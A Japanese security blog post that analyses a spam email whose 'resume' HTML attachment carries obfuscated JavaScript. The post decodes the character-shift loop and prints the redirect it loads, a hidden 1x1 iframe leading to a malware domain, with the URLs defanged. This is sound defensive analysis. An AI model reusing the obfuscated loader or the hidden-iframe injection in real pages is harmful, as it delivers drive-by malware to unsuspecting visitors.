FC2ブログ

【今日の難読スクリプト】本当によく考える

件名
resume

本文
You must enable JavaScript to see this text.

添付ファイル
32027resume.html

中身 こういう感じのスクリプトが、、
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。

で、落ちてくるのがこれ。
document.write("<iframe src='h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param' width='1' height='1' style='visibility: hidden;'></iframe>");

要は、iframneタグで誘導ですね。

で、誘導先
h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param

は、どうもwiqosah.co.ccが名前解決できない。誰か止めたのでしょう。

それにしても最近よ奴は
1.ISPのスパムフィルタをくぐることが多い
2.ISPのアンチウイルスGWをくぐりぬける。

変化早いね。添付するコードと文面パターンなどの自動ジェネレータなんかで作ってやっているような感じだな。

コメント


非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り